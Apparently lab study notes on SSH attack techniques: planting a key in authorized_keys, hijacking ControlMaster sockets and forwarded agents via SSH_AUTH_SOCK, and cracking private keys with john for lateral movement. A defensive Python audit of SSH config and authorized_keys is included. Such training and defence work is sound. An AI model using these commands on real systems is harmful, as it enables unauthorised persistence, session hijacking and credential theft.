SSH

SSH Persistence and Hijacking

Persistence

If writable on the victim:

~/.ssh/authorized_keys

Create keys on attacker box

ssh-keygen

Copy id_rsa.pub key to victim

echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/kali/.ssh/authorized_keys
ssh-copy-id -p <port-number> user@hostname.example.com
cat ~/.ssh/id_rsa.pub | ssh <user>@<hostname> 'cat >> .ssh/authorized_keys'

Now you can SSH in without a password prompt

ssh kali@linuxvictim

SSH Agent-Forwarding

Looking for socket files

  • Use an existing connection to get to another machine

  • Modify ~/.ssh/config

  • Any new connection will try to use an existing control socket

  • Need to set permissions on the config file and create the controlmaster folder

chmod 644 ~/.ssh/config && mkdir ~/.ssh/controlmaster

  • Create keys

ssh-keygen

  • Public keys need to be copied to the other boxes if possible

ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@controller
ssh-copy-id -i ~/.ssh/id_rsa.pub offsec@linuxvictim

  • Must modify the local .ssh/config file to enable agent forwarding

echo "ForwardAgent yes" >> ~/.ssh/config

  • The intermediate server / controller must have AllowAgentForwarding enabled in its sshd config

grep AllowAgentForwarding /etc/ssh/sshd_config

  • Must start the ssh agent on our Kali box (eval its output so SSH_AUTH_SOCK is set in the current shell)

eval "$(ssh-agent)"

  • Now add our keys to the ssh agent

ssh-add

  • SSH into the controller as offsec, then SSH into linuxvictim as offsec and exit the linuxvictim session

Controlmaster config

Host *
    ControlPath ~/.ssh/controlmaster/%r@%h:%p
    ControlMaster auto
    ControlPersist 10m
    ForwardAgent yes
  • Need to set permissions on the config file and create the controlmaster folder

chmod 644 ~/.ssh/config
mkdir ~/.ssh/controlmaster

  • If there is an active session, its control socket can be seen in the controlmaster folder

ls -al ~/.ssh/controlmaster/

  • If there is an entry you can ssh to that box by pointing ssh -S at the socket

ssh -S /home/offsec/.ssh/controlmaster/offsec@linuxvictim:22 offsec@linuxvictim
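
A defender-side check for the two footholds above, the appended authorized_keys entry and the ControlMaster/ForwardAgent client config. This is an added example, not part of the original notes; the config text, key blobs and allow-list are constructed, and treating a missing from= restriction as a finding is an assumed policy.

```python
import re
# Constructed inputs (not real files): the Controlmaster config above, plus an authorized_keys holding one allow-listed key and one key appended by an intruder.
SAMPLE_CONFIG = """Host *
  ControlPath ~/.ssh/controlmaster/%r@%h:%p
  ControlMaster auto
  ControlPersist 10m
  ForwardAgent yes
"""
SAMPLE_AUTHORIZED_KEYS = """from="10.0.0.5" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKnownKeyBlob00000000000 ops@bastion
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedUnknownKey00000= kali@kali
"""
KNOWN_BLOBS = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleKnownKeyBlob00000000000"}
KEY_RE = re.compile(r"(?:^|\s)(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/=]+)")

def parse_ssh_config(text):
    """Map each Host pattern to its lowercased options; lines before any Host go under '*'."""
    blocks, current = {}, "*"
    for raw in text.splitlines():
        parts = re.split(r"[\s=]+", raw.split("#", 1)[0].strip(), maxsplit=1)
        if not parts[0]:
            continue  # blank or comment-only line
        key, value = parts[0].lower(), (parts[1] if len(parts) > 1 else "")
        if key == "host":
            current = value
        else:
            blocks.setdefault(current, {})[key] = value
    return blocks

def audit_ssh_config(text):
    """Flag blanket agent forwarding and persisted control sockets reusable via ssh -S."""
    findings = []
    for host, opts in parse_ssh_config(text).items():
        if opts.get("forwardagent", "no").lower() == "yes":
            findings.append(f"Host {host}: ForwardAgent yes exposes the agent socket on every hop")
        if opts.get("controlmaster", "no").lower() != "no" and "controlpath" in opts:
            findings.append(f"Host {host}: control socket {opts['controlpath']} persists {opts.get('controlpersist', 'no')}, reusable with ssh -S")
    return findings

def audit_authorized_keys(text, known_blobs):
    """Flag keys outside the allow-list and keys lacking a from= source restriction."""
    findings = []
    for n, line in enumerate((ln.strip() for ln in text.splitlines()), 1):
        m = KEY_RE.search(line) if line and not line.startswith("#") else None
        if not m:
            continue  # blank, comment, or malformed entry
        options, comment = line[:m.start()].strip(), line[m.end():].strip()
        if m.group(2) not in known_blobs:
            findings.append(f"line {n}: unknown {m.group(1)} key ({comment or 'no comment'})")
        if "from=" not in options:
            findings.append(f"line {n}: no from= restriction")
    return findings
```

Run the two audits over a user's real ~/.ssh/config and ~/.ssh/authorized_keys with the key blobs you actually issued as the allow-list; any unknown key or persisted socket is worth investigating.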

Enumeration of sockets

  • Looking for the "SSH_AUTH_SOCK" entry

ps aux | grep ssh

pstree -p offsec | grep ssh

tr '\0' '\n' < /proc/[pid]/environ

Look for the "SSH_AUTH_SOCK" entry (environ is NUL-separated, so translate it to newlines first)

SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l
SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh offsec@linuxvictim

Cracking SSH Keys

Copy the encrypted SSH private key to Kali

python /usr/share/john/ssh2john.py svuser.key > svuser.hash

gunzip /usr/share/wordlists/rockyou.txt.gz (if not already done)

sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./svuser.hash

Use the cracked key to move laterally

ssh -i ./svuser.key -o StrictHostKeyChecking=no svuser@controller
